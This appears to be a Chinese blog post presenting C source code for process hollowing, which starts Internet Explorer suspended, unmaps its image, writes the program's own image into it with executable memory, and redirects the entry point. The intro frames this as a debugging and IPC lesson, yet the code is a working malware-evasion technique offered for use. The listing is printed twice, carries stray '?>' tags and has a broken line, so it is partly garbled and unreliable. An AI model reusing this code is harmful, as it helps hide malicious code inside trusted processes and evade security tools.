本文介绍了一个用于进程注入的技术实现案例,展示了如何通过Windows API函数创建并注入进程,以及如何利用ZwUnmapViewOfSection等内核API进行内存映射和重定位。该技术对于理解进程间通信和调试技术具有重要意义。
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ntdll.lib")
typedef long NTSTATUS ;
NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection (
HANDLE ProcessHandle ,
PVOID BaseAddress
);
typedef struct _ChildProcessInfo
{
DWORD dwBaseAddress ;
DWORD dwReserve ;
} CHILDPROCESS ;
char szIePath[MAX_PATH ];
BOOL FindIePath(char *IePath,int *dwBuffSize );
BOOL InjectProcess(void );
DWORD GetSelfImageSize(HMODULE hModule );
BOOL CreateInjectProcess (
PPROCESS_INFORMATION pi ,
PCONTEXT pThreadCxt ,
CHILDPROCESS * pChildProcess
);
int main(void )
{
if (InjectProcess () )
{
printf("This is my a test code,made by shadow3./r/n" );
}
else
{
MessageBox(NULL,"进程插入完成","Text",MB_OK );
}
return 0 ;
}
BOOL FindIePath(char *IePath,int *dwBuffSize )
{
char szSystemDir[MAX_PATH ];
GetSystemDirectory(szSystemDir,MAX_PATH );
szSystemDir[2] = ''
lstrcat(szSystemDir,"/Program Files/Internet Explorer/iexplore.exe" );
lstrcpy(IePath, szSystemDir );
return TRUE ;
}
BOOL InjectProcess(void )
{
char szModulePath[MAX_PATH ];
DWORD dwImageSize = 0 ;
STARTUPINFO si = {0 };
PROCESS_INFORMATION pi ;
CONTEXT ThreadCxt ;
DWORD *PPEB ;
DWORD dwWrite = 0 ;
CHILDPROCESS stChildProcess ;
LPVOID lpVirtual = NULL ;
PIMAGE_DOS_HEADER pDosheader = NULL ;
PIMAGE_NT_HEADERS pVirPeHead = NULL ;
HMODULE hModule = NULL ;
ZeroMemory(szModulePath,MAX_PATH );
ZeroMemory(szIePath,MAX_PATH );
GetModuleFileName(NULL,szModulePath,MAX_PATH );
FindIePath(szIePath,NULL );
if ( lstrcmpiA(szIePath,szModulePath) == 0 )
{
return FALSE ;
}
hModule = GetModuleHandle(NULL );
if ( hModule == NULL )
{
return FALSE ;
}
pDosheader = (PIMAGE_DOS_HEADER)hModule ;
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew );
dwImageSize = GetSelfImageSize(hModule );
if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess ) )
{
printf("CHILD PID: [%d]/r/n",pi.dwProcessId );
if ( ZwUnmapViewOfSection (
pi.hProcess ,
(LPVOID)stChildProcess. dwBaseAddress
) == 0 )
{
lpVirtual = VirtualAllocEx (
pi.hProcess ,
(LPVOID)hModule ,
dwImageSize ,
MEM_RESERVE │ MEM_COMMIT, PAGE_EXECUTE_READWRITE
);
if ( lpVirtual )
{
printf("Unmapped and Allocated Mem Success./r/n" );
}
}
else
{
printf("ZwUnmapViewOfSection() failed./r/n" );
return TRUE ;
}
if ( lpVirtual )
{
PPEB = (DWORD *)ThreadCxt.Ebx ;
// 重写装载地址
WriteProcessMemory (
pi.hProcess ,
&PPEB[2 ],
&lpVirtual ,
sizeof(DWORD ),
& dwWrite
);
if ( WriteProcessMemory (
pi.hProcess ,
lpVirtual ,
hModule ,
dwImageSize ,
&dwWrite ) )
{
printf("image inject into process success./r/n" );
ThreadCxt.ContextFlags = CONTEXT_FULL ;
if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
{
ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint ;
}
else
{
ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint ;
}
#ifdef DEBUG
printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax );
printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx );
printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx );
printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx );
printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip );
#endif
SetThreadContext(pi.hThread, &ThreadCxt );
ResumeThread(pi.hThread );
}
else
{
printf("WirteMemory Failed,code:%d/r/n",GetLastError ());
TerminateProcess(pi.hProcess, 0 );
}
}
else
{
printf("VirtualMemory Failed,code:%d/r/n",GetLastError ());
TerminateProcess(pi.hProcess, 0 );
}
}
return TRUE ;
}
DWORD GetSelfImageSize(HMODULE hModule )
{
DWORD dwImageSize ;
_asm
{
mov ecx, 0x30
mov eax, fs:[ecx ]
mov eax, [eax + 0x0c ]
mov esi, [eax + 0x0c ]
add esi, 0x20
lodsd
mov dwImageSize, eax
}
return dwImageSize ;
}
BOOL CreateInjectProcess (
PPROCESS_INFORMATION pi ,
PCONTEXT pThreadCxt ,
CHILDPROCESS * pChildProcess
)
{
STARTUPINFO si = {0 };
DWORD *PPEB ;
DWORD read ;
// 使用挂起模式启动ie
if( CreateProcess (
NULL ,
szIePath ,
NULL ,
NULL ,
0 ,
CREATE_SUSPENDED ,
NULL ,
NULL ,
&si ,
pi
) )
{
pThreadCxt->ContextFlags = CONTEXT_FULL ;
GetThreadContext(pi->hThread, pThreadCxt );
PPEB = (DWORD *)pThreadCxt->Ebx ;
// 得到ie的装载基地址
ReadProcessMemory (
pi->hProcess ,
&PPEB[2 ],
(LPVOID)&(pChildProcess->dwBaseAddress ),
sizeof(DWORD ),
& read
);
return TRUE ;
}
return FALSE ;
}
?>
#include <windows.h>
#pragma comment(lib,"ntdll.lib")
typedef long NTSTATUS ;
NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection (
HANDLE ProcessHandle ,
PVOID BaseAddress
);
typedef struct _ChildProcessInfo
{
DWORD dwBaseAddress ;
DWORD dwReserve ;
} CHILDPROCESS ;
char szIePath[MAX_PATH ];
BOOL FindIePath(char *IePath,int *dwBuffSize );
BOOL InjectProcess(void );
DWORD GetSelfImageSize(HMODULE hModule );
BOOL CreateInjectProcess (
PPROCESS_INFORMATION pi ,
PCONTEXT pThreadCxt ,
CHILDPROCESS * pChildProcess
);
int main(void )
{
if (InjectProcess () )
{
printf("This is my a test code,made by shadow3./r/n" );
}
else
{
MessageBox(NULL,"进程插入完成","Text",MB_OK );
}
return 0 ;
}
BOOL FindIePath(char *IePath,int *dwBuffSize )
{
char szSystemDir[MAX_PATH ];
GetSystemDirectory(szSystemDir,MAX_PATH );
szSystemDir[2] = ''
lstrcat(szSystemDir,"/Program Files/Internet Explorer/iexplore.exe" );
lstrcpy(IePath, szSystemDir );
return TRUE ;
}
BOOL InjectProcess(void )
{
char szModulePath[MAX_PATH ];
DWORD dwImageSize = 0 ;
STARTUPINFO si = {0 };
PROCESS_INFORMATION pi ;
CONTEXT ThreadCxt ;
DWORD *PPEB ;
DWORD dwWrite = 0 ;
CHILDPROCESS stChildProcess ;
LPVOID lpVirtual = NULL ;
PIMAGE_DOS_HEADER pDosheader = NULL ;
PIMAGE_NT_HEADERS pVirPeHead = NULL ;
HMODULE hModule = NULL ;
ZeroMemory(szModulePath,MAX_PATH );
ZeroMemory(szIePath,MAX_PATH );
GetModuleFileName(NULL,szModulePath,MAX_PATH );
FindIePath(szIePath,NULL );
if ( lstrcmpiA(szIePath,szModulePath) == 0 )
{
return FALSE ;
}
hModule = GetModuleHandle(NULL );
if ( hModule == NULL )
{
return FALSE ;
}
pDosheader = (PIMAGE_DOS_HEADER)hModule ;
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew );
dwImageSize = GetSelfImageSize(hModule );
if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess ) )
{
printf("CHILD PID: [%d]/r/n",pi.dwProcessId );
if ( ZwUnmapViewOfSection (
pi.hProcess ,
(LPVOID)stChildProcess. dwBaseAddress
) == 0 )
{
lpVirtual = VirtualAllocEx (
pi.hProcess ,
(LPVOID)hModule ,
dwImageSize ,
MEM_RESERVE │ MEM_COMMIT, PAGE_EXECUTE_READWRITE
);
if ( lpVirtual )
{
printf("Unmapped and Allocated Mem Success./r/n" );
}
}
else
{
printf("ZwUnmapViewOfSection() failed./r/n" );
return TRUE ;
}
if ( lpVirtual )
{
PPEB = (DWORD *)ThreadCxt.Ebx ;
// 重写装载地址
WriteProcessMemory (
pi.hProcess ,
&PPEB[2 ],
&lpVirtual ,
sizeof(DWORD ),
& dwWrite
);
if ( WriteProcessMemory (
pi.hProcess ,
lpVirtual ,
hModule ,
dwImageSize ,
&dwWrite ) )
{
printf("image inject into process success./r/n" );
ThreadCxt.ContextFlags = CONTEXT_FULL ;
if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
{
ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint ;
}
else
{
ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint ;
}
#ifdef DEBUG
printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax );
printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx );
printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx );
printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx );
printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip );
#endif
SetThreadContext(pi.hThread, &ThreadCxt );
ResumeThread(pi.hThread );
}
else
{
printf("WirteMemory Failed,code:%d/r/n",GetLastError ());
TerminateProcess(pi.hProcess, 0 );
}
}
else
{
printf("VirtualMemory Failed,code:%d/r/n",GetLastError ());
TerminateProcess(pi.hProcess, 0 );
}
}
return TRUE ;
}
DWORD GetSelfImageSize(HMODULE hModule )
{
DWORD dwImageSize ;
_asm
{
mov ecx, 0x30
mov eax, fs:[ecx ]
mov eax, [eax + 0x0c ]
mov esi, [eax + 0x0c ]
add esi, 0x20
lodsd
mov dwImageSize, eax
}
return dwImageSize ;
}
BOOL CreateInjectProcess (
PPROCESS_INFORMATION pi ,
PCONTEXT pThreadCxt ,
CHILDPROCESS * pChildProcess
)
{
STARTUPINFO si = {0 };
DWORD *PPEB ;
DWORD read ;
// 使用挂起模式启动ie
if( CreateProcess (
NULL ,
szIePath ,
NULL ,
NULL ,
0 ,
CREATE_SUSPENDED ,
NULL ,
NULL ,
&si ,
pi
) )
{
pThreadCxt->ContextFlags = CONTEXT_FULL ;
GetThreadContext(pi->hThread, pThreadCxt );
PPEB = (DWORD *)pThreadCxt->Ebx ;
// 得到ie的装载基地址
ReadProcessMemory (
pi->hProcess ,
&PPEB[2 ],
(LPVOID)&(pChildProcess->dwBaseAddress ),
sizeof(DWORD ),
& read
);
return TRUE ;
}
return FALSE ;
}
?>
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
